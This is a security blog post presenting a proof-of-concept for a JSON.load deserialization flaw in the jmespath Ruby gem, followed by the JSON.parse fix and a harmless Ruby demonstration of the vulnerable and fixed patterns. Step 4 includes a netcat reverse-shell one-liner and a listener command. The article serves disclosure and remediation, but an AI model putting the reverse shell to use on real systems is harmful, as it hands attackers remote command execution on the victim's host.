Here’s a Proof-of-Concept for CVE-2022-32511 to Gain Remote Code Execution

Written by heydanny | Published 2022/07/25
Tech Story Tags: cybersecurity | application-security | secure-coding | source-code | open-source | code-review | owasp-top-10 | web-app-development

TL;DR: Affected versions of the jmespath Ruby gem are vulnerable to Deserialization of Untrusted Data because they decode string input with `JSON.load`, which is unsafe on untrusted input. To reproduce, install JMESPath 1.6.0 or earlier, pick a reverse-shell payload (the one below is from pentestmonkey.net) and feed it to the vulnerable library from irb.

Description

Affected versions of the jmespath gem (1.6.0 and earlier) are vulnerable to Deserialization of Untrusted Data: when `JMESPath.search` is handed JSON as a String it decodes it with `JSON.load`, which is unsafe on untrusted input because it honours the `json_class` key and instantiates any loaded class that defines `json_create`, passing it the attacker-controlled hash.

Proof-of-concept

1. Install JMESPath 1.6.0 or earlier:

2. Start the Interactive Ruby Shell (irb), from which the library will be loaded:

irb

3. If irb is not installed, install it with:

gem install irb

4. Pick the desired payload; I have picked one from pentestmonkey (replace 'IP' with the address of your listener and start it first with `nc -lvnp 1234`):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f

5. Finally, require the vulnerable JMESPath library and supply the payload to trigger the reverse shell:

Conclusion

Use `JSON.parse` instead of `JSON.load` on any input you do not control, which is exactly what jmespath 1.6.1 does. `JSON.load` defaults to `create_additions: true`, so a document containing a `json_class` key is not validated as plain data but turned into an instance of the named class via its `json_create` method, which is what turns untrusted JSON into Remote Code Execution here. `JSON.parse` defaults to `create_additions: false` and returns the same document as an ordinary Hash. Note one behavioural difference when migrating: `JSON.load` returns nil for blank input, while `JSON.parse` raises `JSON::ParserError`, so callers that previously relied on the nil need an explicit check.
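The following is an added example, not code from the article or from the jmespath gem. It models the vulnerable pattern described in the proof-of-concept (a search-style function that passes a String straight to `JSON.load`) next to the fixed `JSON.parse` variant, and shows the `json_class` mechanism from the conclusion in action. `AuditedGadget`, `search_vulnerable`, `search_fixed` and the `UNTRUSTED` document are hypothetical names constructed for the demonstration; the gadget only records the value it was handed instead of running anything, so the example is safe to run with nothing but Ruby's standard library.

```ruby
require 'json'

# Hypothetical stand-in for any loaded class that defines json_create
# (constructed for this example; not part of jmespath or the json gem).
# JSON.load calls json_create with the decoded hash whenever it meets
# {"json_class": "AuditedGadget", ...} anywhere in the document, nested or not.
class AuditedGadget
  @@created = []
  def self.created
    @@created
  end

  def self.json_create(obj)
    # A real gadget would act on attacker data here; we only record it.
    @@created << obj['cmd']
    new(obj['cmd'])
  end

  attr_reader :cmd
  def initialize(cmd)
    @cmd = cmd
  end
end

# Modelled on the vulnerable pattern (jmespath <= 1.6.0 decoded String input
# with JSON.load). Not the gem's code; the lookup is a trivial key fetch.
def search_vulnerable(expression, data)
  data = JSON.load(data) if data.is_a?(String)
  data.is_a?(Hash) ? data[expression] : data
end

# Hardened variant: JSON.parse defaults to create_additions: false, so the
# json_class key is just another string value in an ordinary Hash.
def search_fixed(expression, data)
  data = JSON.parse(data) if data.is_a?(String)
  data.is_a?(Hash) ? data[expression] : data
end

# Constructed attacker-controlled document: valid JSON that names a class.
UNTRUSTED = '{"foo": {"json_class": "AuditedGadget", "cmd": "id"}}'

# Runs both variants over the same input and reports what each returned.
def demo
  vuln  = search_vulnerable('foo', UNTRUSTED)
  fixed = search_fixed('foo', UNTRUSTED)
  {
    vulnerable_class: vuln.class.name,   # "AuditedGadget": json_create was invoked
    fixed_class:      fixed.class.name,  # "Hash": data stayed data
    created:          AuditedGadget.created
  }
end

# Migration caveat: JSON.load tolerates blank input and returns nil, while
# JSON.parse raises, so code that swaps one for the other must handle this.
def parse_blank
  loaded = JSON.load('')
  parsed = begin
    JSON.parse('')
  rescue JSON::ParserError
    :parser_error
  end
  [loaded, parsed]
end

if $PROGRAM_NAME == __FILE__
  p demo
  p parse_blank
end
```

Run it with `ruby poc_model.rb`: the vulnerable path returns an `AuditedGadget` whose `json_create` received the attacker's hash, the fixed path returns a plain Hash with the same keys, and recent json gems additionally print a deprecation warning about implicit `create_additions` on the `JSON.load` call.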


Written by heydanny | 😉Just another security guy | 🐱Hacking for fun, money, and for a social cause
Published by HackerNoon on 2022/07/25